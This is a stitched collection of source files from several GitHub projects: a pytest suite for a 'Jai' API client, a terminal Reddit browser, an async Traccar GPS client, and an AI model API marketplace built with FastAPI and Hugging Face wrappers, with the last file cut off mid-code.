train = train.drop(columns=["PassengerId"]).iloc[:MAX_SIZE]
query = train.loc[np.random.choice(len(train), 10, replace=False)]
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
j.setup(name,
train,
db_type="SelfSupervised",
hyperparams={"max_epochs": 3},
overwrite=True)
assert j.is_valid(name), f"valid name {name} after setup failed"
ids = train.index.tolist()
assert j.ids(name) == [f"{len(ids)} items from {min(ids)} to {max(ids)}"
], 'ids simple failed'
assert j.ids(name, 'complete') == ids, "ids complete failed"
for k, from_api in j.fields(name).items():
if k == 'id':
continue
original = str(train[k].dtype)
if original == 'object':
original = 'string'
assert original == from_api, "dtype from api {from_api} differ from data {original}"
result = j.similar(name, query)
# try to use j.predict on a self-supervised database
# this will raise an exception
with pytest.raises(ValueError):
j.predict(name, dict())
assert isinstance(result, list), "similar result failed"
# try to set up the same database again
# without overwriting it
with pytest.raises(KeyError):
j.setup(name, train, db_type="SelfSupervised")
j.delete_database(name)
assert not j.is_valid(name), "valid name after delete failed"
# =============================================================================
# Test Supervised
# =============================================================================
def test_supervised(setup_dataframe):
name = 'test_supervised'
train, test = setup_dataframe
train = train.rename(columns={"PassengerId": "id"}).iloc[:MAX_SIZE]
test = test.rename(columns={"PassengerId": "id"}).iloc[:MAX_SIZE]
query = test.loc[np.random.choice(len(test), 10, replace=False)]
j = Jai(url=URL, auth_key=AUTH_KEY)
if j.is_valid(name):
j.delete_database(name)
j.fit(name,
train,
db_type="Supervised",
overwrite=True,
hyperparams={"max_epochs": 3},
label={
"task": "metric_classification",
"label_name": "Survived"
},
split={
"type": 'stratified',
"split_column": "Survived",
"test_size": .2
})
assert j.is_valid(name), f"valid name {name} after setup failed"
ids = train['id'].tolist()
assert j.ids(name) == [f"{len(ids)} items from {min(ids)} to {max(ids)}"
], 'ids simple failed'
assert j.ids(name, 'complete') == ids, "ids complete failed"
for k, from_api in j.fields(name).items():
if k == 'Survived':
continue
original = str(train[k].dtype)
if original == 'object':
original = 'string'
assert original == from_api, "dtype from api {from_api} differ from data {original}"
result = j.similar(name, query)
assert isinstance(result, list), "similar result failed"
result = j.predict(name, query)
# since we have a supervised database already inplace
# we test one of its exceptions
with pytest.raises(ValueError):
j.predict(name, dict())
assert isinstance(result, list), "predict result failed"
j.append(name, test)
ids = train['id'].tolist() + test['id'].tolist()
assert j.ids(name) == [f"{len(ids)} items from {min(ids)} to {max(ids)}"
], 'ids simple failed'
assert j.ids(name, 'complete') == ids, "ids complete failed"
# test _delete_tree method here
j._delete_tree(name)
assert not j.is_valid(name), "valid name after delete failed"
``` |
{
"source": "jquast/redterm",
"score": 3
} |
#### File: redterm/redterm/__main__.py
```python
import argparse
import logging
import os
import yaml
import redterm.browser
import redterm.pages
import redterm.terminal
logging.basicConfig(filename="./redterm.debug.log", level=logging.DEBUG, filemode="w")
argument_parser = argparse.ArgumentParser()
argument_parser.add_argument('-s', '--subreddit', nargs=1, help='Go to specified subreddit')
arguments = argument_parser.parse_args()
# Load settings
dir_config = os.environ['HOME'] + '/.redterm/'
file_config = dir_config + 'config.yml'
try:
with open(file_config, 'r') as file:
config = yaml.load(file)
except OSError:
if not os.path.exists(dir_config):
os.makedirs(dir_config)
yaml.dump({'browser': 'lynx', 'subreddits': ['letsnotmeet', 'python']}, open(file_config, 'w'))
with open(file_config, 'r') as file:
config = yaml.load(file)
logging.debug(config['browser'])
logging.debug(config['subreddits'])
def main():
"""First entry point."""
terminal_io = redterm.terminal.IO()
if arguments.subreddit:
subreddit_title = arguments.subreddit[0]
else:
subreddit_title = 'frontpage'
with terminal_io.setup():
page = redterm.pages.PageSubreddit(subreddit_title, redterm.terminal.terminal.width)
terminal_io.pages.append(page)
while True:
page_current = terminal_io.pages[-1]
item_selected = page_current.items[page_current.item_selected]
terminal_io.status_text = 'Viewing.'
terminal_io.render()
# Controls
key_pressed = terminal_io.get_key(1)
if key_pressed.code == redterm.terminal.KEY_UP or key_pressed == 'k':
terminal_io.select_item_prev()
elif key_pressed.code == redterm.terminal.KEY_DOWN or key_pressed == 'j':
# If in subreddit mode, download remaining items if at last item
if type(page_current) is redterm.pages.PageSubreddit:
if page_current.item_selected == len(page_current.items) - 1:
terminal_io.status_text = 'Loading...'
terminal_io.render()
terminal_io.pages[-1].update()
terminal_io.reset()
terminal_io.status_text = 'Viewing.'
terminal_io.select_item_next()
elif key_pressed.code == redterm.terminal.KEY_PGUP:
terminal_io.select_item_prevscreen()
elif key_pressed.code == redterm.terminal.KEY_PGDN:
terminal_io.select_item_nextscreen()
elif key_pressed.code == redterm.terminal.KEY_ENTER:
terminal_io.status_text = 'Loading...'
terminal_io.render()
try:
new_page = redterm.pages.PageSubmission(item_selected, terminal_io.terminal_width)
terminal_io.pages.append(new_page)
terminal_io.status_text = 'Viewing.'
terminal_io.reset()
except AttributeError:
pass
finally:
terminal_io.status_text = 'Viewing.'
elif key_pressed == 'o':
try:
url = item_selected.url
redterm.browser.open_browser(config['browser'], url)
except AttributeError:
# Items such as comments have no url, so do nothing
pass
elif key_pressed.code == redterm.terminal.KEY_BACKSPACE:
terminal_io.status_text = 'Loading...'
terminal_io.render()
if len(terminal_io.pages) > 1:
del terminal_io.pages[-1]
terminal_io.reset()
terminal_io.status_text = 'Viewing.'
elif key_pressed.code == redterm.terminal.KEY_ESCAPE:
break
elif not key_pressed:
pass
#logging.debug(key_pressed.code)
if __name__ == '__main__':
main()
```
#### File: redterm/redterm/pages.py
```python
import logging
import re
from urllib.parse import urlparse
import blessed
import praw
import redterm.__init__
terminal = blessed.Terminal()
reddit_api = praw.Reddit(user_agent='desktop:https://github.com/owlowlgo/redterm:' + redterm.__init__.__version__) # TODO Add version
LIMIT = 25 # TODO put this in config file
class PageBase:
"""Base class for how items are to be displayed and selected."""
def __init__(self, name, width, indent=2):
self.name = name
self.items = [] # Items to be displayed on page, such as Submission and Comment objects
self.item_strings = [] # Actual text to be displayed
self._item_strings_formatted = [] # Formatted version of above
self.item_onscreenlocs = [] # Index of locations of items in the buffer
self._item_selected = 0 # Currently selected item
self.item_indentations = [] # Index of indentation level of items
self.width = width # Width of page
self.indent = indent # Indent page by this value
@property
def item_strings_formatted(self):
"""Process items to display to be wrapped according to current terminal size."""
#if self._item_strings_formatted and self.width == terminal.width:
# return self._item_strings_formatted
# Reset current wrapped item info
self._item_strings_formatted = []
self.item_onscreenlocs = []
# Take each item to display by line, and break it into multiple lines based of current terminal width
line_no = 0
for item_no, item_display in enumerate(self.item_strings):
# Confirm indentation level for each item
try:
item_indentation = self.item_indentations[item_no] * 2
except IndexError:
item_indentation = 0
finally:
indentation = self.indent + item_indentation
# Save location of each new broken down line
self.item_onscreenlocs.append(line_no)
for item_display_line in item_display.splitlines():
item_width = self.width - indentation - 1 # Width of item is width of page, minus item indentation, and minus an extra character for the trailing '│' symbol
for line in terminal.wrap(item_display_line, item_width):
if indentation > 1:
line = terminal.bold_white_on_black(' ' * indentation + '│' + line)
else:
line = terminal.bold_white_on_black(' ' * indentation + line)
self._item_strings_formatted.append(line)
line_no += 1
# Add extra blank line under item
line = terminal.bold_white_on_black(' ' * self.width)
self._item_strings_formatted.append(line)
line_no += 1
return self._item_strings_formatted
@property
def item_selected(self):
"""Return currently selected item index."""
return self._item_selected
@item_selected.setter
def item_selected(self, potential_item_selected):
"""Safely update selected item index."""
if 0 <= potential_item_selected < len(self.items):
self._item_selected = potential_item_selected
class PageSubreddit(PageBase):
"""Holds information on how to display subreddit."""
def __init__(self, subreddit_title, width, indent=2):
self.subreddit_title = subreddit_title
PageBase.__init__(self, '/r/' + self.subreddit_title, width, indent=2)
self.submissions = reddit_api.get_subreddit(self.subreddit_title).get_hot(limit=1000)
for i in range(LIMIT):
self.items.append(next(self.submissions))
self.prepare_text()
def prepare_text(self):
"""pass"""
self.item_strings = []
for item_no, item in enumerate(self.items, 1):
self.item_strings.append(terminal.bold_white_on_black(str(item_no) + '. ') +
terminal.bold_white_on_black(str(item.title) + ' (') +
terminal.blue_on_black('{uri.netloc}'.format(uri=urlparse(item.url))) + terminal.bold_white_on_black(')') + '\n' +
terminal.bold_white_on_black(str(item.score) + 'pts ') +
terminal.bold_white_on_black(str(item.num_comments) + ' comments by ') +
terminal.cyan_on_black(str(item.author)) + terminal.bold_white_on_black(' ') +
terminal.cyan_on_black('/r/' + str(item.subreddit)) + '\n')
def update(self):
"""pass"""
for i in range(LIMIT):
try:
self.items.append(next(self.submissions))
except StopIteration:
pass
self.prepare_text()
#derivatives = ('on', 'bright', 'on_bright',)
#colors = set('black red green yellow blue magenta cyan white'.split())
class PageSubmission(PageBase):
"""Holds information on how to display a submission along with comments."""
def __init__(self, submission, width, indent=2):
PageBase.__init__(self, '/r/' + str(submission.subreddit) + '/' + submission.title, width, indent=2)
self.submission = submission
self.item_strings.append(terminal.bold(str(self.submission.title)) + '(' +
terminal.underline_blue('{uri.netloc}'.format(uri=urlparse(self.submission.url))) + ')\n' +
str(self.submission.score) + 'pts ' +
str(self.submission.num_comments) + ' comments by (' +
terminal.underline_cyan(str(self.submission.author)) + ')' +
str(re.sub('\n\s*\n', '\n\n', self.submission.selftext)) + '\n')
for comment in praw.helpers.flatten_tree(submission.comments):
self.items.append(comment)
self.item_indentations = self._get_comment_depth(self.submission, self.items)
for item_no, item in enumerate(self.items):
try:
self.item_strings.append(terminal.white_on_black('* ') + terminal.cyan_on_black(str(item.author)) + ' ' +
str(item.score) + 'pts \n' +
str(item.body) + '\n')
except AttributeError:
self.item_strings.append('* ' + terminal.underline_blue('More comments...'))
self.items = [self.submission] + self.items # TODO This is ugly. Need refactor.
def update(self):
"""pass"""
pass
@staticmethod
def _get_comment_depth(submission, comments):
"""pass"""
comment_depth = [0]
comment_indentation_depth = 0
comment_indentation_depth_ids = [submission.id]
for comment in comments:
if comment.parent_id[3:] in comment_indentation_depth_ids:
comment_indentation_depth = comment_indentation_depth_ids.index(comment.parent_id[3:])
comment_indentation_depth_ids = comment_indentation_depth_ids[0:comment_indentation_depth + 1]
else:
comment_indentation_depth += 1
comment_indentation_depth_ids.append(comment.parent_id[3:])
comment_depth.append(comment_indentation_depth)
return comment_depth
```
#### File: redterm/redterm/terminal.py
```python
import contextlib
import logging
import signal
import sys
import blessed
terminal = blessed.Terminal()
# Key codes used in application.
KEY_DOWN = 258
KEY_UP = 259
KEY_LEFT = 260
KEY_RIGHT = 261
KEY_BACKSPACE = 330
KEY_PGDN = 338
KEY_PGUP = 339
KEY_ENTER = 343
KEY_ESCAPE = 361
class IO:
"""Handles rendering of Page objects."""
def __init__(self):
self.pages = [] # List of all Page-related objects generated for session.
self.page_current = 0 # Keep track of current(last) page.
self.render_buffer = [] # Render buffer. Holds entire page to display.
self.render_offset = 0 # Offset to keep track of where in render buffer to render from.
self.render_offset_item = 0 # Extra offset to put in account of items which do not fit terminal size.
self.terminal_width = 0 # Remember terminal width.
self.terminal_height = 0 # Remember terminal height.
self.status_text = ''
# Initialize terminal
print(terminal.enter_fullscreen)
print(terminal.clear)
# Init signal for terminal resize event.
signal.signal(signal.SIGWINCH, self.on_resize)
def render(self):
"""Render last page while keeping in account of key press updates and resizing."""
self.page_current = self.pages[-1]
# Remember terminal size.
self.terminal_width = terminal.width
self.terminal_height = terminal.height - 1
# Do not render if no items exist in page yet.
if not self.page_current.items:
return
# Fill buffer with content if empty.
if not self.render_buffer:
for line in self.page_current.item_strings_formatted:
line += terminal.on_black(' ' * (self.terminal_width - terminal.length(line)))
self.render_buffer.append(line)
self.render_offset = self.page_current.item_onscreenlocs[self.page_current.item_selected]
# Adjust the rendering offset if selected menu item is out of bounds of current terminal.
if self.page_current.item_onscreenlocs[self.page_current.item_selected] >= self.render_offset + self.terminal_height:
self.render_offset += self.terminal_height
elif self.page_current.item_onscreenlocs[self.page_current.item_selected] < self.render_offset:
self.render_offset -= self.terminal_height
if self.render_offset < 0:
self.render_offset = 0
# Render buffer content to terminal
for buffer_line_no in range(self.terminal_height):
try:
buffer_line = self.render_buffer[self.render_offset + self.render_offset_item + buffer_line_no]
print(terminal.move(buffer_line_no, 0) + buffer_line, end='')
except IndexError:
# Print blank line in case buffer is empty
print(terminal.move(buffer_line_no, 0) + (terminal.on_black(' ' * self.terminal_width)), end='')
# Render status
print(terminal.move(self.terminal_height, 0) + (terminal.black_on_cyan(self.status_text + ' ' * (self.terminal_width - terminal.length(self.status_text)))), end='')
# Render cursor.
# TODO Need to fix bug where the cursor occasionally gets drawn outside the screen and disrupting the rendering process
if self.render_offset_item == 0:
cursor = terminal.white_on_black('>')
try:
cursor += terminal.white_on_black('-' * (self.page_current.item_indentations[self.page_current.item_selected] * 2))
except IndexError:
pass
print(terminal.move(self.page_current.item_onscreenlocs[self.page_current.item_selected] - self.render_offset, 0) + cursor)
def on_resize(self, *args):
"""Re-perform wrapping of text to accommodate new terminal size."""
self.page_current.width = terminal.width # Give page new terminal width
self.render_buffer = []
self.render() # Re-render buffer
def reset(self):
"""Empty render buffer and repopulate it with current page."""
# TODO Need to redo this so that it doesn't scrap cached page data each time this is run.
self.page_current = self.pages[-1]
self.page_current.width = terminal.width # Give page new terminal width
self.render_buffer = []
#self.render_offset = 0
#self.render_offset_item = 0
self.render()
def _get_distance_betweenitems(self, item_no1, item_no2):
"""Determine distance between 2 items does not fit terminal height"""
try:
if item_no1 >= 0 and item_no2 >= 0:
loc_current = self.page_current.item_onscreenlocs[item_no1]
loc_potential = self.page_current.item_onscreenlocs[item_no2]
distance = abs(loc_potential - loc_current)
else:
distance = 0
except IndexError:
distance = 0
return distance
def select_item_next(self):
"""Determine whether to render the next item, or just adjust self.render_offset_item."""
# If current item fits terminal height choose next item,
# if not, adjust render_offset_item without selecting new item(Edge case)
loc_diff = self._get_distance_betweenitems(self.page_current.item_selected, self.page_current.item_selected + 1)
if loc_diff - self.render_offset_item < self.terminal_height:
self.page_current.item_selected += 1
self.render_offset_item = 0
else:
self.render_offset_item += self.terminal_height
self.render() # TODO Why the render function needs to be called for instant update unknown. Need to look into.
def select_item_prev(self):
"""Determine whether to render the previous item, or just adjust self.render_offset_item."""
loc_diff = self._get_distance_betweenitems(self.page_current.item_selected, self.page_current.item_selected - 1)
if loc_diff + self.render_offset_item < self.terminal_height:
self.page_current.item_selected -= 1
self.render_offset_item = 0
else:
self.render_offset_item -= self.terminal_height
self.render() # TODO Why the render function needs to be called for instant update unknown. Need to look into.
def select_item_nextscreen(self):
"""pass"""
self.page_current.item_selected = self._get_out_of_screen_item_loc_next()
def select_item_prevscreen(self):
"""pass"""
self.page_current.item_selected = self._get_out_of_screen_item_loc_prev()
def _get_out_of_screen_item_loc_next(self):
"""Returns closest item index on next page."""
new_loc = self.page_current.item_onscreenlocs[self.page_current.item_selected] + self.terminal_height + 1
closest_item_index = self._get_index_closest_val(self.page_current.item_onscreenlocs, new_loc)
return closest_item_index
def _get_out_of_screen_item_loc_prev(self):
"""Returns closest item index on previous page."""
new_loc = self.page_current.item_onscreenlocs[self.page_current.item_selected] - self.terminal_height
closest_item_index = self._get_index_closest_val(self.page_current.item_onscreenlocs, new_loc)
return closest_item_index
@staticmethod
def _get_index_closest_val(list, val):
"""Return index of closest value within list."""
return min(range(len(list)), key=lambda i: abs(list[i]-val))
@contextlib.contextmanager
def setup(self):
"""Set up required terminal modes."""
try:
with terminal.cbreak(), terminal.hidden_cursor():
yield
finally:
print(terminal.clear)
print(terminal.exit_fullscreen)
@staticmethod
def get_key(timeout=0):
"""Returns input object."""
return terminal.inkey(timeout=timeout)
``` |
{
"source": "jquatier/pytraccar",
"score": 3
} |
#### File: jquatier/pytraccar/example.py
```python
import asyncio
import aiohttp
from pytraccar.api import API
HOST = '192.168.2.11'
async def test():
"""Example usage of pytraccar."""
async with aiohttp.ClientSession() as session:
data = API(LOOP, session, 'admin', 'admin', HOST)
await data.get_device_info()
print("Device info:", data.device_info)
LOOP = asyncio.get_event_loop()
LOOP.run_until_complete(test())
```
#### File: pytraccar/pytraccar/api.py
```python
import asyncio
import logging
import socket
import aiohttp
import async_timeout
_LOGGER = logging.getLogger(__name__)
HEADERS = {'Content-Type': 'application/json', 'Accept': 'application/json'}
class API(object):
"""A class for the Traccar API."""
def __init__(self, loop, session, username, password,
host, port=8082, ssl=False):
"""Initialize the class."""
self._loop = loop
self._auth = aiohttp.BasicAuth(username, password)
schema = 'https' if ssl else 'http'
self._api = schema + '://' + host + ':' + str(port) + '/api'
self._session = session
self._authenticated = False
self._geofences = {}
self._devices = []
self._positions = []
self._device_info = {}
async def test_connection(self):
"""Get the local installed version."""
base_url = self._api + '/devices'
try:
async with async_timeout.timeout(5, loop=self._loop):
response = await self._session.get(base_url,
auth=self._auth,
headers=HEADERS)
if response.status == 200:
self._authenticated = True
except (asyncio.TimeoutError,
aiohttp.ClientError, socket.gaierror) as error:
_LOGGER.error('Error connecting to Traccar, %s', error)
async def get_device_info(self):
"""Get the local installed version."""
await self.get_geofences()
await self.get_devices()
await self.get_positions()
devinfo = {}
try:
for dev in self._devices or []:
for pos in self._positions or []:
if pos['deviceId'] == dev.get('id'):
unique_id = dev.get('uniqueId')
devinfo[unique_id] = {}
devinfo[unique_id]['device_id'] = dev.get('id')
devinfo[unique_id]['device_id'] = dev.get('name')
devinfo[unique_id]['address'] = pos.get('address')
devinfo[unique_id]['updated'] = dev.get('lastUpdate')
devinfo[unique_id]['category'] = dev.get('category')
devinfo[unique_id]['latitude'] = pos.get('latitude')
devinfo[unique_id]['longitude'] = pos.get('longitude')
devinfo[unique_id]['altitude'] = pos.get('altitude')
devinfo[unique_id]['speed'] = pos.get('speed')
devattr = pos.get('attributes', {})
battery_level = devattr.get('batteryLevel')
motion = devattr.get('motion')
devinfo[unique_id]['battery'] = battery_level
devinfo[unique_id]['motion'] = motion
try:
geofence = self.geofences[dev['geofenceIds'][0]]
except IndexError:
geofence = None
devinfo[unique_id]['geofence'] = geofence
self._device_info = devinfo
_LOGGER.debug(self._device_info)
except KeyError as error:
_LOGGER.error('Error combining data from Traccar, %s', error)
async def get_geofences(self):
"""Get the local installed version."""
base_url = self._api + '/geofences'
try:
async with async_timeout.timeout(5, loop=self._loop):
response = await self._session.get(base_url,
auth=self._auth,
headers=HEADERS)
data = await response.json()
for geofence in data or []:
self._geofences[geofence['id']] = geofence['name']
_LOGGER.debug(self._geofences)
except (asyncio.TimeoutError,
aiohttp.ClientError, socket.gaierror) as error:
_LOGGER.error('Error fetching data from Traccar, %s', error)
async def get_devices(self):
"""Get the local installed version."""
base_url = self._api + '/devices'
try:
async with async_timeout.timeout(5, loop=self._loop):
response = await self._session.get(base_url,
auth=self._auth,
headers=HEADERS)
data = await response.json()
self._devices = data
_LOGGER.debug(self._devices)
except (asyncio.TimeoutError,
aiohttp.ClientError, socket.gaierror) as error:
_LOGGER.error('Error fetching data from Traccar, %s', error)
async def get_positions(self):
"""Get the local installed version."""
base_url = self._api + '/positions'
try:
async with async_timeout.timeout(5, loop=self._loop):
response = await self._session.get(base_url,
auth=self._auth,
headers=HEADERS)
data = await response.json()
self._positions = data
_LOGGER.debug(self._positions)
except (asyncio.TimeoutError,
aiohttp.ClientError, socket.gaierror) as error:
_LOGGER.error('Error fetching data from Traccar, %s', error)
@property
def geofences(self):
"""Return the configured geofences if any."""
return self._geofences
@property
def devices(self):
"""Return the devices if any."""
return self._devices
@property
def positions(self):
"""Return the device positions if any."""
return self._positions
@property
def device_info(self):
"""Return the device info if any."""
return self._device_info
@property
def authenticated(self):
"""Return bool that indicate the success of the authentication."""
return self._authenticated
``` |
{
"source": "jqueguiner/ai-api-marketplace-",
"score": 3
} |
#### File: ocrs/tesseract-denoising/tesseract-denoising.py
```python
import numpy as np
import cv2
import pytesseract
from PIL import Image
import re
def predict(image, source_language):
#image = cv2.imread(image)
nparr = np.fromstring(image, np.uint8)
img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)
gray = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)
gray_thresh = cv2.medianBlur(gray, 3)
text = str(pytesseract.image_to_string(gray_thresh))
out = re.sub(r'[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\xff]', '', text)
return [out.strip()]
```
#### File: autocorrects/flexudy-t5-base-multi-sentence-doctor/flexudy-t5-base-multi-sentence-doctor.py
```python
from transformers import AutoTokenizer, AutoModelWithLMHead
def predict(sentence):
tokenizer = AutoTokenizer.from_pretrained("flexudy/t5-base-multi-sentence-doctor")
model = AutoModelWithLMHead.from_pretrained("flexudy/t5-base-multi-sentence-doctor")
input_text = f"repair_sentence: {sentence}</s>"
input_ids = tokenizer.encode(input_text, return_tensors="pt")
outputs = model.generate(input_ids, max_length=32, num_beams=1)
sentence = tokenizer.decode(outputs[0], skip_special_tokens=True, clean_up_tokenization_spaces=True)
return sentence
```
#### File: hate-speech-detections/Hate-speech-CNERG-dehatebert-mono-english/Hate-speech-CNERG-dehatebert-mono-english.py
```python
from pydantic import BaseModel
import torch
from transformers import BertTokenizer, BertForSequenceClassification
def predict(text):
# load model
model = BertForSequenceClassification.from_pretrained('Hate-speech-CNERG/bert-base-uncased-hatexplain')
tokenizer = BertTokenizer.from_pretrained('Hate-speech-CNERG/bert-base-uncased-hatexplain')
# load model into gpu
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model.to(device)
inputs = tokenizer(text, return_tensors="pt")
outputs = model(**inputs)
label = torch.argmax(torch.nn.functional.softmax(outputs.logits,dim=1))
if (label == 0):
label = "hate-speech"
elif (label == 2):
label = "offensive"
else:
label = "normal"
return label
```
#### File: language-detections/toftrup-etal-2021/toftrup-etal-2021.py
```python
from LanguageIdentifier import predict, rank
import json
def predict(text):
output = list()
for k,v in rank(text):
output.append({'language': k, 'score': v})
return json.dumps(output)
```
#### File: lemmatizations/wordnet/wordnet.py
```python
import nltk
from nltk.stem import WordNetLemmatizer
def predict(sentence):
lemmatizer = WordNetLemmatizer()
word_list = nltk.word_tokenize(sentence)
lemmatized_output = [lemmatizer.lemmatize(w) for w in word_list]
return lemmatized_output
```
#### File: next-word-predictions/distilbert-base-uncased/distilbert-base-uncased.py
```python
from happytransformer import HappyWordPrediction
def predict(sentence):
happy_wp = HappyWordPrediction("DISTILBERT", "distilbert-base-uncased")
result = happy_wp.predict_mask(f"{sentence} [MASK]")
return result[0].token
```
#### File: sentence-paraphrasers/ramsrigouthamg-t5-large-paraphraser-diverse-high-quality/ramsrigouthamg-t5-large-paraphraser-diverse-high-quality.py
```python
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
import torch
def predict(context):
model = AutoModelForSeq2SeqLM.from_pretrained("ramsrigouthamg/t5-large-paraphraser-diverse-high-quality")
tokenizer = AutoTokenizer.from_pretrained("ramsrigouthamg/t5-large-paraphraser-diverse-high-quality")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print ("device ",device)
model = model.to(device)
text = "paraphrase: "+ context + " </s>"
encoding = tokenizer.encode_plus(text, max_length =128, padding=True, return_tensors="pt")
input_ids,attention_mask = encoding["input_ids"].to(device), encoding["attention_mask"].to(device)
model.eval()
beam_outputs = model.generate(
input_ids=input_ids,attention_mask=attention_mask,
max_length=128,
early_stopping=True,
num_beams=15,
num_beam_groups = 5,
num_return_sequences=5,
diversity_penalty = 0.70
)
output = []
for beam_output in beam_outputs:
sent = tokenizer.decode(beam_output, skip_special_tokens=True,clean_up_tokenization_spaces=True)
output.append(sent.replace("paraphrasedoutput: ", ""))
return output
```
#### File: sentiment-analyses/distilbert-base-uncased/distilbert-base-uncased.py
```python
from happytransformer import HappyTextClassification
import json
def predict(text):
happy_tc = HappyTextClassification("DISTILBERT", "distilbert-base-uncased", num_labels=2)
result = happy_tc.classify_text(text)
#print(result) # TextClassificationResult(label='LABEL_0', score=0.9998761415481567)
return json.dumps({"label": "POSITIVE" if result.label == "LABEL_0" else "NEGATIVE", "score": result.score})
```
#### File: similarities/all-MiniLM-L6-v2/all-MiniLM-L6-v2.py
```python
from sentence_transformers import SentenceTransformer, util
import numpy as np
def predict(sentence_1, sentence_2):
model = SentenceTransformer('all-MiniLM-L6-v2')
embedding1 = model.encode(sentence_1, convert_to_tensor=True)
embedding2 = model.encode(sentence_2, convert_to_tensor=True)
cosine_scores = util.pytorch_cos_sim(embedding1, embedding2)
return str(cosine_scores.item())
```
#### File: word-alignments/bert-base-multilingual-cased/bert-base-multilingual-cased.py
```python
import transformers
import torch
import itertools
#https://colab.research.google.com/drive/1205ubqebM0OsZa1nRgbGJBtitgHqIVv6?usp=sharing#scrollTo=smW6s5JJflCN
def predict(input_string_language_1, input_string_language_2):
model = transformers.BertModel.from_pretrained('bert-base-multilingual-cased')
tokenizer = transformers.BertTokenizer.from_pretrained('bert-base-multilingual-cased')
sent_src, sent_tgt = input_string_language_1.strip().split(), input_string_language_2.strip().split()
token_src, token_tgt = [tokenizer.tokenize(word) for word in sent_src], [tokenizer.tokenize(word) for word in sent_tgt]
wid_src, wid_tgt = [tokenizer.convert_tokens_to_ids(x) for x in token_src], [tokenizer.convert_tokens_to_ids(x) for x in token_tgt]
ids_src, ids_tgt = tokenizer.prepare_for_model(list(itertools.chain(*wid_src)), return_tensors='pt', model_max_length=tokenizer.model_max_length, truncation=True)['input_ids'], tokenizer.prepare_for_model(list(itertools.chain(*wid_tgt)), return_tensors='pt', truncation=True, model_max_length=tokenizer.model_max_length)['input_ids']
sub2word_map_src = []
for i, word_list in enumerate(token_src):
sub2word_map_src += [i for x in word_list]
sub2word_map_tgt = []
for i, word_list in enumerate(token_tgt):
sub2word_map_tgt += [i for x in word_list]
# alignment
align_layer = 8
threshold = 1e-3
model.eval()
with torch.no_grad():
out_src = model(ids_src.unsqueeze(0), output_hidden_states=True)[2][align_layer][0, 1:-1]
out_tgt = model(ids_tgt.unsqueeze(0), output_hidden_states=True)[2][align_layer][0, 1:-1]
dot_prod = torch.matmul(out_src, out_tgt.transpose(-1, -2))
softmax_srctgt = torch.nn.Softmax(dim=-1)(dot_prod)
softmax_tgtsrc = torch.nn.Softmax(dim=-2)(dot_prod)
softmax_inter = (softmax_srctgt > threshold)*(softmax_tgtsrc > threshold)
align_subwords = torch.nonzero(softmax_inter, as_tuple=False)
align_words = set()
for i, j in align_subwords:
align_words.add( (sub2word_map_src[i], sub2word_map_tgt[j]) )
output = []
for i, j in sorted(align_words):
output.append({"source": sent_src[i], "target": sent_tgt[j]})
return output
```
#### File: ai-api-marketplace-/src/main.py
```python
import importlib
import json
import logging
import os
import pkgutil
from fastapi import Depends, FastAPI, HTTPException
from fastapi.encoders import jsonable_encoder
from fastapi.middleware.cors import CORSMiddleware
from fastapi.openapi.docs import get_swagger_ui_html
from fastapi.openapi.utils import get_openapi
from fastapi.security.oauth2 import (OAuth2, OAuthFlowsModel,
get_authorization_scheme_param)
from fastapi_utils.timing import add_timing_middleware, record_timing
from icecream import ic
from prometheus_fastapi_instrumentator import Instrumentator, metrics
from starlette.requests import Request
from starlette.responses import HTMLResponse, JSONResponse, RedirectResponse
import apis
import os
from fastapi.responses import ORJSONResponse
from pattern.text.en import singularize
config_file = os.getenv('API_CONFIG_FILE', 'config.json')
if os.path.isfile(config_file):
with open("config.json", "r") as f:
config = json.load(f)
try:
logging.basicConfig(level=logging.INFO, format=config["logs"]["log_format"])
except:
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
app = FastAPI(default_response_class=ORJSONResponse)
if config["prometheus"]["active"]:
instrumentator = Instrumentator(
should_group_status_codes=config["prometheus"]["instrumentator"][
"should_group_status_codes"
],
should_ignore_untemplated=config["prometheus"]["instrumentator"][
"should_ignore_untemplated"
],
should_group_untemplated=config["prometheus"]["instrumentator"][
"should_group_untemplated"
],
should_respect_env_var=config["prometheus"]["instrumentator"][
"should_respect_env_var"
],
env_var_name=config["prometheus"]["instrumentator"]["env_var_name"],
excluded_handlers=config["prometheus"]["instrumentator"]["excluded_handlers"],
should_round_latency_decimals=config["prometheus"]["instrumentator"][
"should_round_latency_decimals"
],
round_latency_decimals=config["prometheus"]["instrumentator"][
"round_latency_decimals"
],
should_instrument_requests_inprogress=config["prometheus"]["instrumentator"][
"should_instrument_requests_inprogress"
],
inprogress_name=config["prometheus"]["instrumentator"]["inprogress_name"],
inprogress_labels=config["prometheus"]["instrumentator"]["inprogress_labels"],
)
if config["logs"]["timing_activated"]:
add_timing_middleware(app, record=logger.info, prefix="app")
app.add_middleware(
CORSMiddleware,
allow_origins=config["CORS"]["allow_origins"],
allow_credentials=config["CORS"]["allow_credentials"],
allow_methods=config["CORS"]["allow_methods"],
allow_headers=config["CORS"]["allow_headers"],
)
def import_submodules(package, recursive=True):
global active_tasks
if isinstance(package, str):
current_package = package.split(".")
package = importlib.import_module(package)
for loader, name, is_pkg in pkgutil.walk_packages(package.__path__):
full_name = package.__name__ + "." + name
this_module = importlib.import_module(full_name)
module_short_name = full_name.replace("apis", "")[1:]
if "router" in dir(this_module):
module_input, module_output, module_task = module_short_name.split(".")
module_task = singularize(module_task).upper()
active_task_list = list(
map(
lambda each: singularize(each).upper(),
config["active_tasks"][module_input][module_output],
)
)
if "None".upper() not in active_task_list and (
"*" in config["active_tasks"][module_input][module_output]
or module_task in active_task_list
):
module_prefix = full_name.replace(".", "/").replace("apis", "")
ic(f"Loading module: {full_name}")
app.include_router(this_module.router, prefix=module_prefix)
if recursive and is_pkg:
ic(module_short_name)
module_split = module_short_name.split(".")
if len(module_split) == 1:
import_submodules(full_name)
elif (
len(module_split) == 2
and "None".upper
not in map(
lambda each: each.upper(),
config["active_tasks"][module_split[0]][module_split[1]],
)
or len(config["active_tasks"][module_split[0]][module_split[1]]) == 0
):
ic(f"importing {full_name}")
import_submodules(full_name)
elif len(module_split) == 3 and (
module_split[2].rstrip("s")
in map(
